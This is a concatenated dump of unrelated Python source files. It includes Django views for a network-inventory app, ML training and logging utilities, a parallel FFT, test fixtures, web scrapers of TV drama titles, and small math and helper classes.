        # through to an undefined ``model`` (previously a NameError).
        print("Use file late_fusion.py to run TSCNN with trained LMCNet and MCNet")
        return
    else:
        raise ValueError(f"Unknown mode: {args.mode!r}")
    criterion = nn.CrossEntropyLoss()
    # Paper specifies "variant of stochastic gradient descent" with reference
    # pointing to Adam. Weight decay used for L2 regularisation.
    optimizer = optim.Adam(model.parameters(), lr=args.learning_rate,
                           weight_decay=args.weight_decay)
    log_dir = get_summary_writer_log_dir(args)
    print(f"Writing logs to {log_dir}")
    summary_writer = SummaryWriter(
        str(log_dir),
        flush_secs=5
    )
    trainer = Trainer(
        model, train_loader, test_loader, criterion, optimizer, summary_writer,
        DEVICE, args.checkpoint_path, args.checkpoint_frequency
    )
    trainer.train(
        args.epochs,
        args.val_frequency,
        print_frequency=args.print_frequency,
        log_frequency=args.log_frequency,
    )
    summary_writer.close()
def get_summary_writer_log_dir(args: argparse.Namespace) -> str:
    """Pick a fresh TensorBoard log directory for this run.

    Appends an increasing run counter to a prefix derived from the
    hyper-parameters, returning the first candidate under ``args.log_dir``
    that does not yet exist, so separate runs never share a TB directory.

    Args:
        args: CLI arguments (``mode``, ``dropout``, ``batch_size``,
            ``learning_rate`` and ``log_dir`` are used).

    Returns:
        The chosen directory as a string.
    """
    prefix = (
        f'CNN_bn_mode={args.mode}_dropout={args.dropout}'
        f'_bs={args.batch_size}_lr={args.learning_rate}_run_'
    )
    candidate = None
    for run in range(1000):
        candidate = args.log_dir / f"{prefix}{run}"
        if not candidate.exists():
            return str(candidate)
    # Same fallback as before: after 1000 attempts, reuse the last candidate.
    return str(candidate)
if __name__ == "__main__":
main(parser.parse_args())
|
21,509 | 92de645c3d39328a78a690eccd4a2feb76122dd0 | import os
from datetime import datetime
import logging
import Constants
import sys
def setup_logging():
    """Configure the root logger with a timestamped file plus stdout output.

    Creates ``Constants.LOGS_DIR`` if needed, attaches an INFO-level file
    handler writing to ``<LOGS_DIR>/<timestamp>.txt`` and a stdout handler,
    and returns the configured root logger.

    NOTE(review): calling this more than once adds duplicate handlers, and
    the stream handler's DEBUG level is moot because the root logger is set
    to INFO — confirm whether DEBUG console output was intended.
    """
    os.makedirs(Constants.LOGS_DIR, exist_ok=True)
    timestamp = datetime.now().strftime("%Y-%m-%d %H-%M-%S")
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)
    # os.path.join instead of string concatenation keeps the path portable.
    file_handler = logging.FileHandler(
        mode="w", filename=os.path.join(Constants.LOGS_DIR, timestamp + ".txt"))
    file_handler.setLevel(logging.INFO)
    logger.addHandler(file_handler)
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setLevel(logging.DEBUG)
    logger.addHandler(console_handler)
    return logger
|
21,510 | 7eceb96a94ab46be217c6aa2c4deeaedd89b97b0 | import numpy as np
# Element-wise arithmetic on equal-length numpy arrays.
x = np.array([1, 2, 3])
print(x)
y = np.array([2, 4, 6])
print(x + y)
print(x * y)
print(x / y)
# z = np.array([100, 200])
# print(x + z)  # raises ValueError: the arrays have different lengths
|
21,511 | 2dfb36c204ddcb565fde01b98f35bd06bbcbf31b | # -*- coding: utf-8 -*-
__author__ = 'lundberg'
# -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.http import HttpResponse, Http404
from django.shortcuts import get_object_or_404, render, redirect
from django.conf import settings
from re import escape as re_escape
import json
from apps.noclook.models import NodeHandle, NodeType
from apps.noclook import arborgraph
from apps.noclook import helpers
import norduniclient as nc
def index(request):
return render(request, 'noclook/index.html', {})
@login_required
def logout_page(request):
"""
Log users out and redirects them to the index.
"""
logout(request)
return redirect('/')
# Visualization views
@login_required
def visualize_json(request, handle_id):
"""
Creates a JSON representation of the node and the adjacent nodes.
This JSON data is then used by Arbor.js (http://arborjs.org/) to make
a visual representation.
"""
# Get the node
nh = NodeHandle.objects.get(pk=handle_id)
root_node = nc.get_node_model(nc.graphdb.manager, nh.handle_id)
if root_node:
# Create the data JSON structure needed
graph_dict = arborgraph.create_generic_graph(root_node)
jsonstr = arborgraph.get_json(graph_dict)
else:
jsonstr = '{}'
return HttpResponse(jsonstr, content_type='application/json')
@login_required
def visualize(request, slug, handle_id):
"""
Visualize view with JS that loads JSON data.
"""
nh = get_object_or_404(NodeHandle, pk=handle_id)
node = nh.get_node()
return render(request, 'noclook/visualize/visualize.html', {'node_handle': nh, 'node': node, 'slug': slug})
@login_required
def visualize_maximize(request, slug, handle_id):
"""
Visualize view with JS that loads JSON data.
"""
nh = get_object_or_404(NodeHandle, pk=handle_id)
node = nh.get_node()
return render(request, 'noclook/visualize/visualize_maximize.html',
{'node_handle': nh, 'node': node, 'slug': slug})
# Search views
@login_required
def search(request, value='', form=None):
"""
Search through nodes either from a POSTed search query or through an
URL like /slug/key/value/ or /slug/value/.
"""
result = []
posted = False
if request.POST:
value = request.POST.get('q', '')
posted = True
if value:
query = u'(?i).*{}.*'.format(re_escape(value))
# nodes = nc.search_nodes_by_value(nc.graphdb.manager, query)
# TODO: when search uses the above go back to that
q = """
match (n:Node) where any(prop in keys(n) where n[prop] =~ $search) return n
"""
nodes = nc.query_to_list(nc.graphdb.manager, q, search=query)
if form == 'csv':
return helpers.dicts_to_csv_response([n['n'] for n in nodes])
elif form == 'xls':
return helpers.dicts_to_xls_response([n['n'] for n in nodes])
for node in nodes:
nh = get_object_or_404(NodeHandle, pk=node['n']['handle_id'])
item = {'node': node['n'], 'nh': nh}
result.append(item)
if len(result) == 1:
return redirect(result[0]['nh'].get_absolute_url())
return render(request, 'noclook/search_result.html', {'value': value, 'result': result, 'posted': posted})
@login_required
def search_autocomplete(request):
    """Return autocomplete suggestions for the ``query`` GET parameter.

    The JSON payload matches what the autocomplete widget expects::

        {
            "query": "Li",
            "suggestions": ["Liberia", "Liechtenstein", "Lithuania"],
            "data": ["LR", "LY", "LI", "LT"]
        }

    An empty body is returned when no query is supplied or the index
    lookup fails.
    """
    response = HttpResponse(content_type='application/json')
    query = request.GET.get('query', None)
    if query:
        try:
            suggestions = [
                node['name']
                for node in nc.get_indexed_node(nc.graphdb.manager, 'name', query)
            ]
            json.dump({'query': query, 'suggestions': suggestions, 'data': []}, response)
        except Exception:
            # Best effort: fall through and return the (empty) response.
            pass
    # Always return an HttpResponse: the previous ``return False`` for an
    # empty query made Django raise "view didn't return an HttpResponse".
    return response
def regex_escape(_in):
    """Escape regex metacharacters in ``_in``.

    Accepts either a single string or a list of strings.  Lists are escaped
    element-wise and returned as a list: the previous implementation
    returned a one-shot ``map`` iterator (Python 3), which is silently
    exhausted after a single pass, and used ``type(...) is list`` instead
    of ``isinstance``.
    """
    if isinstance(_in, list):
        return [regex_escape(item) for item in _in]
    return re_escape(_in)
@login_required
def search_port_typeahead(request):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
try:
# TODO: check if size(nodes(p))/size(path) in neo4j>=4.4 is equivalent to length(nodes(p))/length(path) in neo4j==3.5
q = """
MATCH (port:Port)<-[:Has]-(n:Node)
OPTIONAL MATCH (n)-[:Located_in]->(n2:Node)
OPTIONAL MATCH p = () - [:Has * 0..20]->(n2)
WITH COLLECT(nodes(p)) as paths, MAX(size(nodes(p))) AS maxLength,
port.handle_id AS handle_id, n.handle_id AS parent_id,
port.name AS port_name, n.name AS node_name
WITH [path IN paths WHERE size(path) = maxLength] AS longestPaths,
handle_id AS handle_id, parent_id AS parent_id, port_name AS port_name, node_name AS node_name
UNWIND(longestPaths) AS location_path
WITH REDUCE(s = "", n IN location_path | s + n.name + " ") + node_name + " " + port_name AS name, handle_id, parent_id
WHERE name =~ $name_re
RETURN name, handle_id, parent_id
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, name_re=name_re)
except Exception as e:
raise e
json.dump(result, response)
return response
@login_required
def search_location_typeahead(request):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
try:
# find all has relations to the top
q = """
MATCH p = (:Location) - [:Has * 0..20]-> (l:Location)
WITH COLLECT(nodes(p)) as paths, MAX(size(nodes(p))) AS maxLength, l.handle_id as handle_id
WITH [path IN paths WHERE size(path) = maxLength | path ] AS longestPaths, handle_id as handle_id
UNWIND(longestPaths) AS location_path
WITH REDUCE(s = "", n IN location_path | s + n.name + " ") AS name, handle_id
WHERE name =~ $name_re
RETURN name, handle_id
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, name_re=name_re)
except Exception as e:
raise e
json.dump(result, response)
return response
@login_required
def search_non_location_typeahead(request):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
try:
q = """
MATCH (n:Node)
WHERE not n:Location
OPTIONAL MATCH (n)<-[:Has]-(e:Node)
WITH n.handle_id as handle_id,
coalesce(e.name, "") + " "+ n.name as name,
labels(n) as labels
WHERE name =~ $name_re
RETURN handle_id, trim(name) as name, labels ORDER BY name
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, name_re=name_re)
except Exception as e:
raise e
for r in result:
_type = [l for l in r['labels'] if l not in ['Node', 'Physical', 'Logical', 'Relation']]
if _type:
r['name'] = u'{} [{}]'.format(r['name'], _type[0])
# TODO: do stuff with labels
json.dump(result, response)
return response
@login_required
def typeahead_slugs(request, slug='Node'):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
labels = [helpers.slug_to_node_type(s).get_label() for s in slug.split('+')]
try:
q = """
MATCH (n:Node)
WHERE any(label in labels(n) where label in $labels)
OPTIONAL MATCH (n)<-[:Has]-(e:Node)
WITH n.handle_id as handle_id,
coalesce(e.name, "") + " "+ n.name as name,
labels(n) as labels
WHERE name =~ $name_re
RETURN handle_id, trim(name) as name, labels ORDER BY name
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, labels=labels, name_re=name_re)
except Exception as e:
raise e
if '+' in slug:
for r in result:
_type = [lab for lab in r['labels'] if lab not in ['Node', 'Physical', 'Logical', 'Relation']]
if _type:
r['name'] = u'{} [{}]'.format(r['name'], _type[0])
json.dump(result, response)
return response
@login_required
def find_all(request, slug=None, key=None, value=None, form=None):
"""
Search through nodes either from a POSTed search query or through an
URL like /slug/key/value/, /slug/value/ /key/value/, /value/ or /key/.
"""
label = None
node_type = None
if request.POST:
value = request.POST.get('q', '') # search for '' if blank
if slug:
try:
node_type = get_object_or_404(NodeType, slug=slug)
label = node_type.get_label()
except Http404:
return render(request, 'noclook/search_result.html',
{'node_type': slug, 'key': key, 'value': value, 'result': None,
'node_meta_type': None})
if value:
nodes = nc.search_nodes_by_value(nc.graphdb.manager, value, key, label)
else:
nodes = nc.get_nodes_by_type(nc.graphdb.manager, label)
if form == 'csv':
return helpers.dicts_to_csv_response(list(nodes))
elif form == 'xls':
return helpers.dicts_to_xls_response(list(nodes))
result = []
for node in nodes:
nh = get_object_or_404(NodeHandle, pk=node['handle_id'])
item = {'node': node, 'nh': nh}
result.append(item)
return render(request, 'noclook/search_result.html',
{'node_type': node_type, 'key': key, 'value': value, 'result': result})
# Google maps views
@login_required
def gmaps(request, slug):
api_key = settings.GOOGLE_MAPS_API_KEY
return render(request, 'noclook/google_maps.html', {'slug': slug, 'maps_api_key': api_key})
@login_required
def gmaps_json(request, slug):
"""
Directs gmap json requests to the right view.
"""
gmap_views = {
'sites': gmaps_sites,
'optical-nodes': gmaps_optical_nodes
}
try:
return gmap_views[slug](request)
except KeyError:
raise Http404
@login_required
def gmaps_sites(request):
"""
Return a json object with node dicts.
{
nodes: [
{
name: '',
url: '',
lng: 0.0,
lat: 0.0
},
],
edges: []
}
"""
sites = nc.get_nodes_by_type(nc.graphdb.manager, 'Site')
site_list = []
for site in sites:
try:
site = {
'name': site['name'],
'url': helpers.get_node_url(site['handle_id']),
'lng': float(str(site.get('longitude', 0))),
'lat': float(str(site.get('latitude', 0)))
}
except KeyError:
continue
site_list.append(site)
response = HttpResponse(content_type='application/json')
json.dump({'nodes': site_list, 'edges': []}, response)
return response
@login_required
def gmaps_optical_nodes(request):
"""
Return a json object with dicts of optical node and cables.
{
nodes: [
{
name: '',
url: '',
lng: 0.0,
lat: 0.0
},
],
edges: [
{
name: '',
url: '',
end_points: [{lng: 0.0, lat: 0.0,},]
}
]
"""
# Cypher query to get all cables with cable type fiber that are connected
# to two optical node.
q = """
MATCH (cable:Cable)
WHERE cable.cable_type = "Dark Fiber"
MATCH (cable)-[Connected_to]->(port)
WITH cable, port
MATCH (port)<-[:Has*0..]-(equipment)
WHERE (equipment:Optical_Node) AND NOT equipment.type =~ "(?i).*tss.*"
WITH cable, port, equipment
MATCH p2=(equipment)-[:Located_in]->()<-[:Has*0..]-(loc)
WHERE (loc:Site)
RETURN cable, equipment, loc
"""
result = nc.query_to_list(nc.graphdb.manager, q)
nodes = {}
edges = {}
for item in result:
node = {
'name': item['equipment']['name'],
'url': helpers.get_node_url(item['equipment']['handle_id']),
'lng': float(str(item['loc'].get('longitude', 0))),
'lat': float(str(item['loc'].get('latitude', 0)))
}
coords = {
'lng': float(str(item['loc'].get('longitude', 0))),
'lat': float(str(item['loc'].get('latitude', 0)))
}
edge = {
'name': item['cable']['name'],
'url': helpers.get_node_url(item['cable']['handle_id']),
'end_points': [coords]
}
nodes[item['equipment']['name']] = node
if item['cable']['name'] in edges:
edges[item['cable']['name']]['end_points'].append(coords)
else:
edges[item['cable']['name']] = edge
response = HttpResponse(content_type='application/json')
json.dump({'nodes': list(nodes.values()), 'edges': list(edges.values())}, response)
return response
@login_required
def qr_lookup(request, name):
hits = list(nc.get_nodes_by_name(nc.graphdb.manager, name))
if len(hits) == 1:
nh = get_object_or_404(NodeHandle, pk=hits[0]['handle_id'])
return redirect(nh.get_absolute_url())
return render(request, 'noclook/qr_result.html', {'hits': hits, 'name': name})
@login_required
def ip_address_lookup(request):
if request.POST:
ip_address = request.POST.get('ip_address', None)
if ip_address:
hostname = helpers.get_hostname_from_address(ip_address)
return HttpResponse(json.dumps(hostname), content_type='application/json')
raise Http404
@login_required
def json_table_to_file(request):
if request.POST:
file_format = request.POST.get('format', None)
data = request.POST.get('data', None)
header = request.POST.get('header', None)
table = json.loads(data)
header = json.loads(header)
if table and file_format == 'csv':
return helpers.dicts_to_csv_response(table, header)
elif table and file_format == 'xls':
return helpers.dicts_to_xls_response(table, header)
raise Http404
|
21,512 | 7243b3624847ff3cfd9a8400a9c50eb9e83ca74b | import pytest
from sklearn.tree import DecisionTreeClassifier
from primrose.configuration.configuration import Configuration
from primrose.readers.dill_reader import DillReader
from primrose.data_object import DataObject, DataObjectResponseType
def test_init_ok():
    """Smoke-test DillReader: load a pickled fixture and check its contents."""
    # Probe the installed sklearn's module layout: ``sklearn.tree.tree``
    # exists only in older versions, so pick the dill fixture whose pickled
    # class paths match the installed sklearn.
    try:
        import sklearn.tree.tree

        model_filename = "test/tinymodel.dill"
    except ModuleNotFoundError:
        model_filename = "test/tinymodel_skl_0_24.dill"
    # Minimal in-memory configuration wiring a single DillReader node.
    config = {
        "implementation_config": {
            "reader_config": {
                "dill_reader": {
                    "class": "DillReader",
                    "filename": model_filename,
                    "destinations": [],
                }
            }
        }
    }
    configuration = Configuration(
        config_location=None, is_dict_config=True, dict_config=config
    )
    data_object = DataObject(configuration)
    reader = DillReader(configuration, "dill_reader")
    # Run the node; it should not request pipeline termination.
    data_object, terminate = reader.run(data_object)
    assert not terminate
    # The fixture is a dict holding a list under "test" and a fitted model.
    data = data_object.get("dill_reader", rtype=DataObjectResponseType.VALUE.value)
    assert data is not None
    assert set(data.keys()) == {"test", "model"}
    node_config = {
        "class": "DillReader",
        "filename": model_filename,
        "destinations": [],
    }
    # necessary_config must advertise a non-empty set of required keys.
    assert isinstance(DillReader.necessary_config(node_config), set)
    assert len(DillReader.necessary_config(node_config)) > 0
    assert data["test"] == [1, 2, 3]
    assert isinstance(data["model"], DecisionTreeClassifier)
|
21,513 | 127918c17891050a9dfa32252a959b1c3d1508b8 | """
Discrete Fast Fourier Transform
"""
import math
from functools import partial
from pyske.core import PList, par
# ------- Fast Fourier Transform ------------
def _bit_complement(index_k: int, index_i: int) -> int:
return index_i ^ (1 << index_k)
def _omega(size: int, log2_size: int, index_j: int, index_i: int) -> complex:
index = index_i >> (log2_size - index_j - 1)
index_2 = 0
for _ in range(0, index_j + 1):
index_2 = 2 * index_2 + 1 if index & 1 else 2 * index_2
index >>= 1
value = 2.0 * math.pi / size * (index_2 << (log2_size - index_j - 1))
return complex(math.cos(value), math.sin(value))
def _combine(size: int, log2_size: int, index_j: int,
             index_i: int, complex_1: complex, complex_2: complex) -> complex:
    # pylint: disable=too-many-arguments
    """Butterfly step: merge two coefficients at FFT stage ``index_j``.

    Bit ``log2_size - index_j - 1`` of ``index_i`` selects which of the two
    butterfly outputs this position produces; the other operand is scaled by
    the stage's twiddle factor from ``_omega``.
    """
    omega_value = _omega(size, log2_size, index_j, index_i)
    if index_i & (1 << log2_size - index_j - 1):
        return complex_1 + omega_value * complex_2
    return complex_2 + omega_value * complex_1
def fft(input_list: PList[complex]) -> PList[complex]:
    # pylint: disable=unsubscriptable-object
    """
    Return the Discrete Fourier Transform.

    Examples::

        >>> from pyske.core import PList
        >>> fft(PList.init(lambda _: 1.0, 128)).to_seq()[0]
        (128+0j)

    Both the list size and the number of processors must be powers of two.

    :param input_list: a PySke list of floating point numbers
    :return: a parallel list of complex numbers
    """
    size = len(input_list)
    log2_size = int(math.log2(size))
    nprocs = len(par.procs())
    log2_nprocs = int(math.log2(nprocs))
    assert size == 2 ** log2_size
    assert nprocs == 2 ** log2_nprocs
    result = input_list.map(complex)
    # First log2(nprocs) butterfly stages pair elements living on different
    # processors: permute whole partitions across processors, then combine.
    for index_j in range(0, log2_nprocs):
        permutation = result.get_partition()\
            .permute(partial(_bit_complement, log2_nprocs - index_j - 1))\
            .flatten()
        result = permutation.map2i(partial(_combine, size, log2_size, index_j), result)
    # Remaining stages pair elements within each local partition.
    # NOTE(review): the lambda captures ``index_j`` late; this is only safe
    # if ``map`` applies it eagerly within each loop iteration — confirm
    # against PySke's evaluation semantics.
    for index_j in range(log2_nprocs, log2_size):
        permutation = result.get_partition()\
            .map(lambda l: l.permute(partial(_bit_complement, log2_size - index_j - 1)))\
            .flatten()
        result = permutation.map2i(partial(_combine, size, log2_size, index_j), result)
    return result
# -------------- Execution --------------
def _is_power_of_2(num: int) -> bool:
return num == 2 ** (math.log2(num))
def _main():
    """Benchmark driver: time ``fft`` over ``num_iter`` iterations."""
    import gc
    from pyske.core import Timing
    from pyske.examples.list import util
    size, num_iter, _ = util.standard_parse_command_line(data_arg=False)
    assert _is_power_of_2(size), "The size should be a power of 2."
    assert _is_power_of_2(len(par.procs())), "The number of processors should be a power of 2."
    input_list = PList.init(lambda _: 1.0, size)
    timing = Timing()
    # Disable automatic GC so collections don't pollute the timings;
    # a full collection is forced manually between iterations instead.
    gc.disable()
    for iteration in range(1, 1 + num_iter):
        timing.start()
        result = fft(input_list)
        timing.stop()
        gc.collect()
        # Reduce the parallel result to its first coefficient for reporting.
        result = result.to_seq()[0]
        util.print_experiment(result, timing.get(), par.at_root, iteration)
if __name__ == '__main__':
_main()
|
21,514 | 661fbba5611fc689878d4b9294d2cff082570951 | from django.contrib import admin
from tagsapp.models import Tag
# Register your models here.
admin.site.register(Tag)
|
21,515 | d156aefb885ab84d994be81402c0ce42e5e7f980 | from bs4 import BeautifulSoup
import pandas
import time
from selenium import webdriver
url = 'http://w3.sbs.co.kr/tv/tvsectionMainImg.do?pgmCtg=T&pgmSct=DR&pgmSort=week&div=pc_drama'
driver = webdriver.Firefox()
driver.get(url)
source_code = driver.page_source
soup = BeautifulSoup(source_code, 'lxml')
title_list = list()
broad_list = list()
type_list = list()
for link in soup.find_all('strong', {'class': 'smdpb_tit'}):
link = link.contents
title_list.append(link[0])
broad_list.append("SBS")
type_list.append("drama")
driver.find_element_by_link_text("종영 프로그램").click()
source_code = driver.page_source
soup = BeautifulSoup(source_code, 'lxml')
for link in soup.find_all('strong', {'class': 'smdpb_tit'}):
link = link.contents
title_list.append(link[0])
broad_list.append("SBS")
type_list.append("drama")
drama_title = pandas.DataFrame({'Broadcaster' : broad_list,'title' : title_list,'type' : type_list})
f=open("C:/Users/jaehyun/Crawling/drama_list/SBS.csv","w")
f.write(pandas.DataFrame.to_csv(drama_title))
f.close() |
21,516 | 7b445155345eb6f17e2c74e94e7d41f1b87af400 | import pytest
from rest_framework.test import APIClient
from rest_framework_simplejwt.tokens import RefreshToken
from authentication.models import Dealer
@pytest.fixture
def user():
return Dealer.objects.create_user(
full_name='Leydson Vieira',
cpf='38723274884',
email='leydson.vieira@gmail.com',
password='password'
)
@pytest.fixture
def unlogged_client(user):
client = APIClient()
return client
@pytest.fixture
def logged_client(user):
client = APIClient()
refresh = RefreshToken.for_user(user)
client.credentials(HTTP_AUTHORIZATION=f'Bearer {refresh.access_token}')
return client
|
21,517 | 8ca7405133a55fd5fd61d4313f8bd0c7d119b835 | from behave import when, then, given
import requests
from pydoautomator import Automator
@given(u'droplet {droplet_id:d} exists')
def step_impl(context, droplet_id):
context.droplet_id = droplet_id
full_url = '%s/droplets/%s' % (context.api_uri, context.droplet_id)
response = requests.get(full_url, headers=context.headers)
assert response.status_code == 200, 'response status code is %s' % response.status_code
@when(u'turnoff droplet is called')
def step_impl(context):
aut = Automator(context.token)
aut.turnoff_droplet(context.droplet_id)
@then(u'turnoff droplet')
def step_impl(context):
full_url = '%s/droplets/%s' % (context.api_uri, context.droplet_id)
response = requests.get(full_url, headers=context.headers)
json_resp = response.json()
droplet_status = json_resp['droplet']['status']
assert droplet_status == 'off', 'droplet status is %s! should be off.' % droplet_status
|
21,518 | 94cca0ac76245c7a014dde9c491366c84628fc54 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/4/15 22:20
# @Author : Zheng Xingtao
# @File : z_n_13_复制含有随机指针节点的链表.py
"""
复制含有随机指针节点的链表
【题目】 一种特殊的链表节点类描述如下:
public class Node {
public int value;
public Node next;
public Node rand;
public Node(int data) {
this.value = data;
}
}
Node类中的value是节点值,next指针和正常单链表中next指针的意义一样,都指向下一个节点
rand指针是Node类中新增的指针,这个指针可能指向链表中的任意一个节点,也可能指向null。
给定一个由Node节点类型组成的无环单链表的头节点head,请实现一个函数完成这个链表中所有结构的复制,并返回复制的新链表的头节点。
进阶:
不使用额外的数据结构,只用有限几个变量,且在时间复杂度为O(N)内完成原问题要实现的函数。
""" |
21,519 | 98b3f8cf145b899a12c38fb9bc1bd2942e64ab52 | # Compute w2v based similarity
# Install gensim for this
import sys
import gensim.downloader as api
import numpy as np
from scipy import spatial
from gensim.models import KeyedVectors
# Initialize w2v model
try:
w2v_model = KeyedVectors.load_word2vec_format(
"glove-wiki-gigaword-300-binary", binary=True
)
except:
print("Binary model not present. Loading and saving general model")
w2v_model = api.load("glove-wiki-gigaword-300")
w2v_model.save_word2vec_format("glove-wiki-gigaword-300-binary", binary=True)
def compute_relevance_cost(object_list, term_list):
    """
    Return a relevance *cost* (1 - cosine similarity) between detected
    objects and search terms, using the module-level word2vec model.

    object_list: a list of objects detected from the image
        (e.g., ["beaker", "person", "microscope"])
    term_list: a list of search terms
        (e.g., ["biologist", "a person who studies biology"])

    Lower cost means more relevant.  Multi-word entries are split and
    out-of-vocabulary words are dropped.

    NOTE(review): if every word on either side is out-of-vocabulary the
    filtered list is empty and ``n_similarity`` will fail — confirm inputs
    are always at least partially in-vocabulary.
    """
    object_words = []
    term_words = []
    # Normalise each detected label and keep only in-vocabulary words.
    for ol in object_list:
        ol = ol.strip().replace("_", " ").lower()
        for word in ol.split():
            if word in w2v_model.key_to_index:
                object_words.append(word)
    # Same normalisation for the search terms.
    for tl in term_list:
        tl = tl.strip().replace("_", " ").lower()
        for word in tl.split():
            if word in w2v_model.key_to_index:
                term_words.append(word)
    relevance_cost = 1 - w2v_model.n_similarity(object_words, term_words)
    return relevance_cost
def main():
    """CLI entry point: rank the images listed in ``sys.argv[1]``.

    The input file has one line per image: ``<image_id>,[obj1,obj2,...]``.
    Each image is scored against the hard-coded search terms and the
    (image_id, cost) pairs are printed in ascending cost order, i.e. most
    relevant first.
    """
    terms = ["Biologist"]
    filename = sys.argv[1]
    # image id -> list of detected object labels
    detections = {}
    # ``with`` guarantees the file is closed even if parsing raises
    # (previously relied on an explicit close at the end).
    with open(filename, "r") as infile:
        for line in infile:
            parts = line.strip().split(",", 1)
            detections[parts[0]] = parts[1].lstrip("[").rstrip("]").split(",")
    # Score every image.  A dict comprehension replaces the old
    # ``dict.fromkeys(keys, [])`` pattern, which shares one mutable list
    # across all keys.
    costs = {
        image_id: compute_relevance_cost(objects, terms)
        for image_id, objects in detections.items()
    }
    # Ascending cost = most relevant first (the old comment claimed
    # "high to low", but the sort was and is ascending).
    for item in sorted(costs.items(), key=lambda kv: kv[1]):
        print(item)
if __name__ == "__main__":
main()
|
21,520 | a23aa2a10edf04c5cd66a4c5bd29d65c9b49e1d6 | # Generated by Django 3.1.4 on 2021-01-17 15:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('common', '0008_auto_20210117_1757'),
]
operations = [
migrations.AlterField(
model_name='address',
name='country',
field=models.CharField(choices=[('BG', 'Bulgaria')], max_length=100),
),
]
|
21,521 | ce49d716d2bbb78697bf29bf15ae16f26d0bc46b | class SliceField():
    def __init__(self,field_name,field_style):
        """Store the field's name and its display style."""
        self.field_name = field_name  # identifier of the field
        self.field_style = field_style  # presentation/style descriptor
def get_field_name(self):
return self.field_name |
21,522 | f440a0e816de88791e7790300a2535ca1efcb5b6 | """Кольцо вычетов по модулю."""
class DeductionClassException(Exception):
    '''Wrapper exception raised for invalid use of residue (deduction) classes.'''
    pass
class DeductionClass:
    '''Residue class (class of deductions) of ``a`` modulo ``m``.

    Instances are normalised on construction: the stored representative
    ``self.a`` always satisfies ``0 <= self.a < self.m``.  Arithmetic is
    only defined between residue classes over the same modulus; error
    messages are intentionally kept in the original Russian.
    '''

    def __init__(self, a, m):
        """Create the residue class ``[a] mod m``.

        Raises:
            DeductionClassException: if ``m`` is not an integer greater
                than 1, or ``a`` is not an integer.
        """
        if not (isinstance(m, int) and m > 1):
            raise DeductionClassException(
                "Модуль должен быть натуральным числом, большим единицы.")
        if not isinstance(a, int):
            raise DeductionClassException(
                "Класс вычетов должен быть целым числом.")
        self.m = m
        self.a = a % m

    def __repr__(self):
        return "DeductionClass({!r}, {!r})".format(self.a, self.m)

    def __str__(self):
        # Rendered as "[a]m", e.g. "[2]5".
        return "[" + str(self.a) + "]" + str(self.m)

    def __eq__(self, other):
        # Returning NotImplemented lets Python fall back to the other
        # operand (the previous version raised AttributeError when
        # compared with, e.g., an int).
        if not isinstance(other, DeductionClass):
            return NotImplemented
        return self.a == other.a and self.m == other.m

    def __hash__(self):
        # Consistent with __eq__; defining __eq__ alone had made
        # instances unhashable.
        return hash((self.a, self.m))

    def __add__(self, other):
        """Add two residue classes over the same modulus."""
        if not isinstance(other, DeductionClass):
            raise DeductionClassException(
                "Класс вычетов можно складывать только с классом вычетов.")
        if self.m == other.m:
            return DeductionClass(self.a + other.a, self.m)
        raise DeductionClassException(
            "Складывать можно только классы вычетов по одному модулю.")

    def __radd__(self, other):
        return self + other

    def __neg__(self):
        """Additive inverse: ``-[a]m == [m - a]m``."""
        return DeductionClass(-self.a, self.m)

    def __sub__(self, other):
        return self + (-other)

    def __mul__(self, other):
        """Multiply two residue classes over the same modulus."""
        if not isinstance(other, DeductionClass):
            raise DeductionClassException(
                "Класс вычетов можно умножать только на класс вычетов.")
        if self.m == other.m:
            return DeductionClass(self.a * other.a, self.m)
        raise DeductionClassException(
            "Перемножать можно только классы вычетов по одному модулю.")

    def __rmul__(self, other):
        return self * other
|
21,523 | a456e8f2329947d90c60b17cd21a94a2a45a94ed | from datetime import datetime
from flatten_json import flatten
from time import gmtime, strftime
import time
import requests
import os
import json
import sys
import random
import csv
reload(sys)
sys.setdefaultencoding('utf-8')
import threading
proxies = [{'http': '37.151.43.202:3128', 'https': '37.151.43.202:3128'}, {'http': '219.76.4.12:88', 'https': '219.76.4.12:88'}, {'http': '36.55.231.60:3128', 'https': '36.55.231.60:3128'}, {'http': '101.78.238.26:8118', 'https': '101.78.238.26:8118'}, {'http': '178.32.213.128:80', 'https': '178.32.213.128:80'}, {'http': '163.121.188.2:8080', 'https': '163.121.188.2:8080'}, {'http': '188.166.154.140:8118', 'https': '188.166.154.140:8118'}, {'http': '46.101.73.156:8118', 'https': '46.101.73.156:8118'}, {'http': '177.4.173.242:80', 'https': '177.4.173.242:80'}, {'http': '107.20.111.134:80', 'https': '107.20.111.134:80'}, {'http': '51.254.127.194:8081', 'https': '51.254.127.194:8081'}, {'http': '192.129.189.72:9001', 'https': '192.129.189.72:9001'}, {'http': '77.82.87.125:8081', 'https': '77.82.87.125:8081'}, {'http': '188.166.144.158:8118', 'https': '188.166.144.158:8118'}, {'http': '203.74.4.2:80', 'https': '203.74.4.2:80'}, {'http': '51.254.132.238:80', 'https': '51.254.132.238:80'}, {'http': '128.199.191.123:80', 'https': '128.199.191.123:80'}, {'http': '203.74.4.3:80', 'https': '203.74.4.3:80'}, {'http': '203.74.4.6:80', 'https': '203.74.4.6:80'}, {'http': '203.74.4.7:80', 'https': '203.74.4.7:80'}, {'http': '163.121.188.3:8080', 'https': '163.121.188.3:8080'}, 